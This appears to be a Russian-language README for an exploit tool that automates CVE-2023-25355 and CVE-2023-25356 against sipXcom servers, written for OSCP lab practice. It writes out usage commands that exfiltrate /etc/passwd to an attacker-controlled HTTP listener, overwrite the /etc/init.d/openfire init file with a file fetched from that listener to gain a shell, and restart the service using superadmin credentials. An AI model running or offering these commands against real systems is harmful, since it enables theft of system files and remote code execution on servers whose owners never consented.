
CVE-2023-25355 и CVE-2023-25356 с автоматической перезагрузкой сервиса
Эксплойт был найден [email protected] и представлен в двух замечательных материалах:
Репозиторий для ещё большей автоматизации этой уязвимости опубликовал Alex Linov:
CVE-2023-25355 — это механизм эксфильтрации, при котором файлы с сервера sipXcom загружаются на веб-сервер, контролируемый атакующим.
CVE-2023-25356 — это расширение первой уязвимости, позволяющее записывать файлы, контролируемые атакующим, в файловую систему сервера sipXcom. Поскольку служба sipXcom может перезаписывать свою собственную конфигурацию инициализации, получить оболочку можно легко, как только служба будет перезапущена.
Интересный момент здесь в том, что суперадминистратор sipXcom может перезапускать эту службу. Поэтому цель этого пакета — полностью автоматизировать перезапуск этой службы.
Для подготовки к OSCP существуют лаборатории с машинами для взлома.
В одной конкретной лаборатории машина, подверженная этой уязвимости, была довольно нестабильной, что означало, что иногда приходилось запускать и возвращать лабораторию несколько раз. Это раздражает. При автоматизации это менее раздражает.
Вам потребуется:
poetry install
Затем вы можете запустить инструмент из активного окружения, из текущего каталога или из другого места, используя имя CVE:
# if the poetry environment is active (poetry shell)
cve_2023_25355 --help
# otherwise, from the current directory
poetry run cve_2023_25355 --help
# otherwise from another directory
poetry -C /shared/tools/CVE/CVE-2023-25355 run cve_2023_25355 --help
В следующем примере мы отправляем полезную нагрузку для эксфильтрации файла /etc/passwd, который будет загружен на контролируемый HTTP-слушатель.
cve_2023_25355 \
--xmpp-username my_username --xmpp-password my_password --xmpp-target-username friend_username \
--xmpp-server-address 1.2.3.4 \
--payload '--data-binary @/etc/passwd http://ATTACKER-WEB-LISTENER/some_path'
В следующем примере мы отправляем полезную нагрузку для перезаписи файла /etc/init.d/openfire содержимым указанного URI.
cve_2023_25356 \
--xmpp-username my_username --xmpp-password my_password --xmpp-target-username friend_username \
--xmpp-server-address 1.2.3.4 \
--sipxcom-init-file-source-uri 'http://ATTACKER-WEB-LISTENER/my-offensive-sipx-config'
Затем, если мы знаем пароль суперадминистратора, мы можем перезапустить службу, чтобы перезагрузить конфигурацию и запустить любой гаджет.
run sipxcom_service_restart \
--sipxcom-superuser-username superadmin \
--sipxcom-superuser-password superadmin_password \
--sipxcom-website https://1.2.3.4/
--debug-local-directory /tmp
./proxychains4 -f proxychains.conf cve_2023_25355 [...] --xmpp-server-address 172.1.2.3
Проект: